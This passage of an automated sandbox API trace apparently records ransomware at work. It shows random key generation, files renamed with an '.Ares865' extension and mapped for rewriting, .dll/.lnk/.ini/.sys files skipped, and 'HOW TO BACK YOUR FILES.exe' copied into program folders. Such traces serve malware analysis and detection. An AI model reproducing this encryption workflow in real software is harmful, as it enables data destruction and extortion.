szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0131.282] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0131.282] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0131.283] lstrcpyW (in: lpString1=0x2cce494, lpString2="as90.xsl" | out: lpString1="as90.xsl") returned="as90.xsl" [0131.283] lstrlenW (lpString="as90.xsl") returned 8 [0131.283] lstrlenW (lpString="Ares865") returned 7 [0131.283] lstrcmpiW (lpString1="s90.xsl", lpString2="Ares865") returned 1 [0131.283] lstrlenW (lpString=".dll") returned 4 [0131.283] lstrcmpiW (lpString1="as90.xsl", lpString2=".dll") returned 1 [0131.283] lstrlenW (lpString=".lnk") returned 4 [0131.283] lstrcmpiW (lpString1="as90.xsl", lpString2=".lnk") returned 1 [0131.283] lstrlenW (lpString=".ini") returned 4 [0131.283] lstrcmpiW (lpString1="as90.xsl", lpString2=".ini") returned 1 [0131.283] lstrlenW (lpString=".sys") returned 4 [0131.283] lstrcmpiW (lpString1="as90.xsl", lpString2=".sys") returned 1 [0131.283] lstrlenW (lpString="as90.xsl") returned 8 [0131.283] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\as90.xsl.Ares865") returned 90 [0131.283] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\as90.xsl" (normalized: "c:\\program files (x86)\\microsoft analysis services\\as oledb\\10\\cartridges\\as90.xsl"), lpNewFileName="C:\\Program Files (x86)\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\as90.xsl.Ares865" (normalized: "c:\\program files (x86)\\microsoft analysis services\\as oledb\\10\\cartridges\\as90.xsl.ares865"), dwFlags=0x1) returned 1 [0131.285] CreateFileW (lpFileName="C:\\Program Files (x86)\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\as90.xsl.Ares865" (normalized: "c:\\program files (x86)\\microsoft analysis services\\as oledb\\10\\cartridges\\as90.xsl.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0131.285] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=18738) returned 1 [0131.285] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0131.286] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0131.286] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0131.286] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x4c40, lpName=0x0) returned 0x170 [0131.288] MapViewOfFile (hFileMappingObject=0x170, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x4c40) returned 0x190000 [0131.290] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0131.290] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0131.290] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0131.291] lstrcpyW (in: lpString1=0x2cce494, lpString2="Informix.xsl" | out: lpString1="Informix.xsl") returned="Informix.xsl" [0131.291] lstrlenW (lpString="Informix.xsl") returned 12 [0131.291] lstrlenW (lpString="Ares865") returned 7 [0131.291] lstrcmpiW (lpString1="mix.xsl", lpString2="Ares865") returned 1 [0131.291] lstrlenW (lpString=".dll") returned 4 [0131.291] lstrcmpiW (lpString1="Informix.xsl", lpString2=".dll") returned 1 [0131.291] lstrlenW (lpString=".lnk") returned 4 [0131.291] lstrcmpiW (lpString1="Informix.xsl", lpString2=".lnk") returned 1 [0131.291] lstrlenW (lpString=".ini") returned 4 [0131.291] lstrcmpiW (lpString1="Informix.xsl", lpString2=".ini") returned 1 [0131.291] lstrlenW (lpString=".sys") returned 4 [0131.291] lstrcmpiW (lpString1="Informix.xsl", lpString2=".sys") returned 1 [0131.291] lstrlenW (lpString="Informix.xsl") returned 12 [0131.292] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\Informix.xsl.Ares865") returned 94 [0131.292] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\Informix.xsl" (normalized: "c:\\program files (x86)\\microsoft analysis services\\as oledb\\10\\cartridges\\informix.xsl"), lpNewFileName="C:\\Program Files (x86)\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\Informix.xsl.Ares865" (normalized: "c:\\program files (x86)\\microsoft analysis services\\as oledb\\10\\cartridges\\informix.xsl.ares865"), dwFlags=0x1) returned 1 [0131.293] CreateFileW (lpFileName="C:\\Program Files (x86)\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\Informix.xsl.Ares865" (normalized: "c:\\program files (x86)\\microsoft analysis services\\as oledb\\10\\cartridges\\informix.xsl.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0131.294] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=30948) returned 1 [0131.294] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0131.294] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0131.295] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0131.295] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x7bf0, lpName=0x0) returned 0x170 [0131.296] MapViewOfFile (hFileMappingObject=0x170, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x7bf0) returned 0x190000 [0131.298] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0131.299] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0131.299] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0131.300] lstrcpyW (in: lpString1=0x2cce494, lpString2="msjet.xsl" | out: lpString1="msjet.xsl") returned="msjet.xsl" [0131.300] lstrlenW (lpString="msjet.xsl") returned 9 [0131.300] lstrlenW (lpString="Ares865") returned 7 [0131.300] lstrcmpiW (lpString1="jet.xsl", lpString2="Ares865") returned 1 [0131.300] lstrlenW (lpString=".dll") returned 4 [0131.300] lstrcmpiW (lpString1="msjet.xsl", lpString2=".dll") returned 1 [0131.300] lstrlenW (lpString=".lnk") returned 4 [0131.300] lstrcmpiW (lpString1="msjet.xsl", lpString2=".lnk") returned 1 [0131.300] lstrlenW (lpString=".ini") returned 4 [0131.300] lstrcmpiW (lpString1="msjet.xsl", lpString2=".ini") returned 1 [0131.300] lstrlenW (lpString=".sys") returned 4 [0131.300] lstrcmpiW (lpString1="msjet.xsl", lpString2=".sys") returned 1 [0131.300] lstrlenW (lpString="msjet.xsl") returned 9 [0131.300] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\msjet.xsl.Ares865") returned 91 [0131.301] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\msjet.xsl" (normalized: "c:\\program files (x86)\\microsoft analysis services\\as oledb\\10\\cartridges\\msjet.xsl"), lpNewFileName="C:\\Program Files (x86)\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\msjet.xsl.Ares865" (normalized: "c:\\program files (x86)\\microsoft analysis services\\as oledb\\10\\cartridges\\msjet.xsl.ares865"), dwFlags=0x1) returned 1 [0131.302] CreateFileW (lpFileName="C:\\Program Files (x86)\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\msjet.xsl.Ares865" (normalized: "c:\\program files (x86)\\microsoft analysis services\\as oledb\\10\\cartridges\\msjet.xsl.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0131.302] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=28974) returned 1 [0131.303] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0131.303] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0131.303] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0131.304] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x7430, lpName=0x0) returned 0x170 [0131.305] MapViewOfFile (hFileMappingObject=0x170, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x7430) returned 0x190000 [0131.307] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0131.308] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0131.308] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0131.309] lstrcpyW (in: lpString1=0x2cce494, lpString2="sql2000.xsl" | out: lpString1="sql2000.xsl") returned="sql2000.xsl" [0131.309] lstrlenW (lpString="sql2000.xsl") returned 11 [0131.309] lstrlenW (lpString="Ares865") returned 7 [0131.309] lstrcmpiW (lpString1="000.xsl", lpString2="Ares865") returned -1 [0131.309] lstrlenW (lpString=".dll") returned 4 [0131.309] lstrcmpiW (lpString1="sql2000.xsl", lpString2=".dll") returned 1 [0131.309] lstrlenW (lpString=".lnk") returned 4 [0131.309] lstrcmpiW (lpString1="sql2000.xsl", lpString2=".lnk") returned 1 [0131.309] lstrlenW (lpString=".ini") returned 4 [0131.309] lstrcmpiW (lpString1="sql2000.xsl", lpString2=".ini") returned 1 [0131.309] lstrlenW (lpString=".sys") returned 4 [0131.309] lstrcmpiW (lpString1="sql2000.xsl", lpString2=".sys") returned 1 [0131.309] lstrlenW (lpString="sql2000.xsl") returned 11 [0131.309] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\sql2000.xsl.Ares865") returned 93 [0131.309] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\sql2000.xsl" (normalized: "c:\\program files (x86)\\microsoft analysis services\\as oledb\\10\\cartridges\\sql2000.xsl"), lpNewFileName="C:\\Program Files (x86)\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\sql2000.xsl.Ares865" (normalized: "c:\\program files (x86)\\microsoft analysis services\\as oledb\\10\\cartridges\\sql2000.xsl.ares865"), dwFlags=0x1) returned 1 [0131.311] CreateFileW (lpFileName="C:\\Program Files (x86)\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\sql2000.xsl.Ares865" (normalized: "c:\\program files (x86)\\microsoft analysis services\\as oledb\\10\\cartridges\\sql2000.xsl.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0131.311] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=34076) returned 1 [0131.311] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0131.312] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0131.312] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0131.312] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x8820, lpName=0x0) returned 0x170 [0131.314] MapViewOfFile (hFileMappingObject=0x170, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x8820) returned 0x190000 [0131.316] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0131.317] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0131.317] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0131.318] lstrcpyW (in: lpString1=0x2cce494, lpString2="sql70.xsl" | out: lpString1="sql70.xsl") returned="sql70.xsl" [0131.318] lstrlenW (lpString="sql70.xsl") returned 9 [0131.318] lstrlenW (lpString="Ares865") returned 7 [0131.318] lstrcmpiW (lpString1="l70.xsl", lpString2="Ares865") returned 1 [0131.318] lstrlenW (lpString=".dll") returned 4 [0131.318] lstrcmpiW (lpString1="sql70.xsl", lpString2=".dll") returned 1 [0131.318] lstrlenW (lpString=".lnk") returned 4 [0131.318] lstrcmpiW (lpString1="sql70.xsl", lpString2=".lnk") returned 1 [0131.318] lstrlenW (lpString=".ini") returned 4 [0131.318] lstrcmpiW (lpString1="sql70.xsl", lpString2=".ini") returned 1 [0131.319] lstrlenW (lpString=".sys") returned 4 [0131.319] lstrcmpiW (lpString1="sql70.xsl", lpString2=".sys") returned 1 [0131.319] lstrlenW (lpString="sql70.xsl") returned 9 [0131.319] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\sql70.xsl.Ares865") returned 91 [0131.319] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\sql70.xsl" (normalized: "c:\\program files (x86)\\microsoft analysis services\\as oledb\\10\\cartridges\\sql70.xsl"), lpNewFileName="C:\\Program Files (x86)\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\sql70.xsl.Ares865" (normalized: "c:\\program files (x86)\\microsoft analysis services\\as oledb\\10\\cartridges\\sql70.xsl.ares865"), dwFlags=0x1) returned 1 [0131.324] CreateFileW (lpFileName="C:\\Program Files (x86)\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\sql70.xsl.Ares865" (normalized: "c:\\program files (x86)\\microsoft analysis services\\as oledb\\10\\cartridges\\sql70.xsl.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0131.324] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=32146) returned 1 [0131.324] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0131.325] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0131.325] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0131.325] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x80a0, lpName=0x0) returned 0x170 [0131.326] MapViewOfFile (hFileMappingObject=0x170, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x80a0) returned 0x190000 [0131.329] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0131.329] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0131.329] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0131.330] lstrcpyW (in: lpString1=0x2cce494, lpString2="sql90.xsl" | out: lpString1="sql90.xsl") returned="sql90.xsl" [0131.331] lstrlenW (lpString="sql90.xsl") returned 9 [0131.331] lstrlenW (lpString="Ares865") returned 7 [0131.331] lstrcmpiW (lpString1="l90.xsl", lpString2="Ares865") returned 1 [0131.331] lstrlenW (lpString=".dll") returned 4 [0131.331] lstrcmpiW (lpString1="sql90.xsl", lpString2=".dll") returned 1 [0131.331] lstrlenW (lpString=".lnk") returned 4 [0131.331] lstrcmpiW (lpString1="sql90.xsl", lpString2=".lnk") returned 1 [0131.331] lstrlenW (lpString=".ini") returned 4 [0131.331] lstrcmpiW (lpString1="sql90.xsl", lpString2=".ini") returned 1 [0131.331] lstrlenW (lpString=".sys") returned 4 [0131.331] lstrcmpiW (lpString1="sql90.xsl", lpString2=".sys") returned 1 [0131.331] lstrlenW (lpString="sql90.xsl") returned 9 [0131.331] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\sql90.xsl.Ares865") returned 91 [0131.331] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\sql90.xsl" (normalized: "c:\\program files (x86)\\microsoft analysis services\\as oledb\\10\\cartridges\\sql90.xsl"), lpNewFileName="C:\\Program Files (x86)\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\sql90.xsl.Ares865" (normalized: "c:\\program files (x86)\\microsoft analysis services\\as oledb\\10\\cartridges\\sql90.xsl.ares865"), dwFlags=0x1) returned 1 [0131.333] CreateFileW (lpFileName="C:\\Program Files (x86)\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\sql90.xsl.Ares865" (normalized: "c:\\program files (x86)\\microsoft analysis services\\as oledb\\10\\cartridges\\sql90.xsl.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0131.333] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=39515) returned 1 [0131.334] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0131.334] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0131.334] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0131.335] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x9d60, lpName=0x0) returned 0x170 [0131.336] MapViewOfFile (hFileMappingObject=0x170, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x9d60) returned 0x190000 [0131.339] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0131.339] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0131.339] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0131.340] lstrcpyW (in: lpString1=0x2cce494, lpString2="Sybase.xsl" | out: lpString1="Sybase.xsl") returned="Sybase.xsl" [0131.340] lstrlenW (lpString="Sybase.xsl") returned 10 [0131.340] lstrlenW (lpString="Ares865") returned 7 [0131.340] lstrcmpiW (lpString1="ase.xsl", lpString2="Ares865") returned 1 [0131.340] lstrlenW (lpString=".dll") returned 4 [0131.340] lstrcmpiW (lpString1="Sybase.xsl", lpString2=".dll") returned 1 [0131.341] lstrlenW (lpString=".lnk") returned 4 [0131.341] lstrcmpiW (lpString1="Sybase.xsl", lpString2=".lnk") returned 1 [0131.341] lstrlenW (lpString=".ini") returned 4 [0131.341] lstrcmpiW (lpString1="Sybase.xsl", lpString2=".ini") returned 1 [0131.341] lstrlenW (lpString=".sys") returned 4 [0131.341] lstrcmpiW (lpString1="Sybase.xsl", lpString2=".sys") returned 1 [0131.341] lstrlenW (lpString="Sybase.xsl") returned 10 [0131.341] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\Sybase.xsl.Ares865") returned 92 [0131.341] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\Sybase.xsl" (normalized: "c:\\program files (x86)\\microsoft analysis services\\as oledb\\10\\cartridges\\sybase.xsl"), lpNewFileName="C:\\Program Files (x86)\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\Sybase.xsl.Ares865" (normalized: "c:\\program files (x86)\\microsoft analysis services\\as oledb\\10\\cartridges\\sybase.xsl.ares865"), dwFlags=0x1) returned 1 [0131.343] CreateFileW (lpFileName="C:\\Program Files (x86)\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\Sybase.xsl.Ares865" (normalized: "c:\\program files (x86)\\microsoft analysis services\\as oledb\\10\\cartridges\\sybase.xsl.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0131.343] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=29790) returned 1 [0131.343] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0131.344] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0131.344] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0131.344] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x7760, lpName=0x0) returned 0x170 [0131.346] MapViewOfFile (hFileMappingObject=0x170, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x7760) returned 0x190000 [0131.348] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0131.348] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0131.348] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0131.349] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Program Files (x86)\\Java", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Java") returned="C:\\Program Files (x86)\\Java" [0131.350] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Java" | out: lpString1="C:\\Program Files (x86)\\Java") returned="C:\\Program Files (x86)\\Java" [0131.350] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0131.350] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Java\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\java\\how to back your files.exe"), bFailIfExists=1) returned 0 [0131.350] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0131.351] GetLastError () returned 0x0 [0131.351] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0131.351] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Java\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x734f7d60, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x52924cc0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x52924cc0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0131.351] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0131.351] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0131.352] lstrcpyW (in: lpString1=0x2cce438, lpString2="jre7" | out: lpString1="jre7") returned="jre7" [0131.352] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7948 [0131.352] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x42) returned 0x2ee9c0 [0131.352] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7950 | out: ListHead=0x2e7710, ListEntry=0x2e7950) returned 0x2e7930 [0131.352] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x734f7d60, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x52924cc0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x52924cc0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="jre7", cAlternateFileName="")) returned 0 [0131.352] FindClose (in: hFindFile=0x2ccee8 | out: hFindFile=0x2ccee8) returned 1 [0131.352] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2e7950 [0131.352] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Program Files (x86)\\Java\\jre7", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Java\\jre7") returned="C:\\Program Files (x86)\\Java\\jre7" [0131.352] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Java\\jre7" | out: lpString1="C:\\Program Files (x86)\\Java\\jre7") returned="C:\\Program Files (x86)\\Java\\jre7" [0131.352] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0131.352] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\java\\jre7\\how to back your files.exe"), bFailIfExists=1) returned 0 [0131.353] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), 